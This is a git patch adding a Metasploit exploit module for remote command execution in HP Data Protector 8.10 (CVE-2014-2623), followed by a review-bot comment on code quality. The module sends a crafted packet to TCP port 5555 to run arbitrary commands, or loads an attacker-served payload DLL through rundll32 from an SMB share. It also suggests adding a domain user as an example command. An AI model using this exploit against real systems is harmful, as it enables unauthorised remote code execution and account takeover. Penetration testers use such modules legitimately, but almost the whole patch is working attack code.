From c97a3d9e2ec2ca86534843be109723a155b55c5c Mon Sep 17 00:00:00 2001
From: Matthew Hall
Date: Wed, 10 Dec 2014 09:14:01 +0000
Subject: [PATCH] modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
---
 .../misc/hp_dataprotector_dll_cmd_exec.rb | 156 ++++++++++++++++++
 1 file changed, 156 insertions(+)
 create mode 100644 modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
diff --git a/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
new file mode 100644
index 0000000000..70a83c4e32
--- /dev/null
+++ b/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::SMBFileServer
+ include Msf::Exploit::EXE
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'HP Data Protector 8.10 Remote Command Execution',
+ 'Description' => %q{
+ A remote command execution is triggered when a crafted command is sent to the Hp Data Protector Manager on TCP Port 5555.
+ },
+ 'Author' => [
+ 'Christian (Polunchis) Ramirez https://intrusionlabs.org', # POC
+ 'Henoch (Chanoc) Barrera       https://intrusionlabs.org', # POC
+ 'Matthew Hall ' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2014-2623' ],
+ [ 'URL', 'http://www.exploit-db.com/exploits/34066/'], # POC
+ [ 'URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'],
+ [ 'URL', 'http://www.sec-1.com/blog/']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Privileged' => true,
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'HP Data Protector 8.10', { 'Offset' => 46 } ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Nov 02 2014'))
+ register_options(
+ [
+ Opt::RPORT(5555),
+ OptString.new('CMD',[false, 'The command to run e.g. net user hacker hacker123 /add /domain']),
+ ],
+ self.class)
+ end
+
+ def check
+ fingerprint = get_fingerprint
+
+ if fingerprint.nil?
+ return Exploit::CheckCode::Unknown
+ end
+
+ print_status("#{peer} - HP Data Protector version #{fingerprint}")
+
+ if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
+ minor = $1.to_i
+ else
+ return Exploit::CheckCode::Safe
+ end
+
+ if minor < 11
+ return Exploit::CheckCode::Appears
+ elsif minor == 12
+ return Exploit::CheckCode::Detected
+ else
+ return Exploit::CheckCode::Detected
+ end
+
+ end
+
+ def start_server
+ vprint_status("Generating our malicious dll...")
+ exe = generate_payload_dll
+
+ @exe_file = rand_text_alpha(7) + ".dll"
+ @share = rand_text_alpha(5)
+
+ my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+ @unc = "\\\\#{my_host}\\#{@share}\\#{@exe_file}"
+ vprint_status("About to start SMB Server on: " + @unc)
+ # start_smb_server('UNC Path', 'Payload', 'Name of file to be served')
+ start_smb_server(@unc, exe, @exe_file)
+ end
+
+ def peer
+ "#{rhost}:#{rport}"
+ end
+
+ def get_fingerprint
+ ommni = connect
+ ommni.put(rand_text_alpha_upper(64))
+ resp = ommni.get_once(-1)
+ disconnect
+
+ if resp.nil?
+ return nil
+ end
+
+ Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
+ end
+
+ def exec_bar(cmd)
+ connect
+ cmd = cmd.gsub("\\", "\\\\\\\\")
+ vprint_status("Sending Command: #{cmd}")
+ cmd_no = target['Offset'] + cmd.length
+ vprint_status("Size is #{cmd_no}")
+ pkt = "\x00\x00\x00"
+ pkt << cmd_no
+ pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
+ pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
+ pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
+ pkt << "('#{cmd}')" # Executable
+ pkt << "\x00"
+ sock.put(pkt)
+ # In my testing the default timeout (10) isn't enough
+ if datastore['CMD']
+ begin
+ res = sock.get_once(-1, 20)
+ rescue EOFError
+ disconnect
+ return
+ end
+ fail_with(Failure::Unknown, "#{peer} - Expected answer not received...
aborting...") unless exec_bar?(res)
+ disconnect
+ else
+ handler
+ disconnect
+ end
+ end
+
+ def exec_bar?(data)
+ return false if data.blank?
+ data_unpacked = data.unpack("NnVv")
+ data_unpacked.length == 4 && data_unpacked[0] == 8 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x36 && data_unpacked[3] == 0
+ end
+
+ def exploit
+ if datastore['CMD']
+ print_status("Executing command #{datastore['CMD']}")
+ exec_bar(datastore['CMD'])
+ else
+ start_server
+ print_status("Sending load DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{@unc}")
+ sploit = "rundll32.exe #{@unc},"
+ sploit << rand_text_numeric(1)
+ exec_bar(sploit)
+ end
+ end
+end
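Review bot: In `check`, the `elsif minor == 12` branch returns `Exploit::CheckCode::Detected` exactly as the `else` branch does, so it is dead code and it is unclear whether 8.12 was meant to be reported differently; collapse the three branches to `return Exploit::CheckCode::Appears if minor < 11` followed by `Exploit::CheckCode::Detected`, and replace the bare `$1` with `Regexp.last_match(1)`. The same method only matches banners beginning `HP Data Protector A.08.`, so any other major version is reported `Safe` rather than `Unknown`; if that is intended, a comment such as `# Only the 8.x line is fingerprinted; other versions are reported Safe` would make the decision explicit. Separately, the `rescue EOFError` path in `exec_bar` calls `disconnect` and returns with no message, so the operator gets no indication that the service closed the connection before answering; a `print_error("#{peer} - Connection closed before a response was received")` ahead of the `return` would surface it.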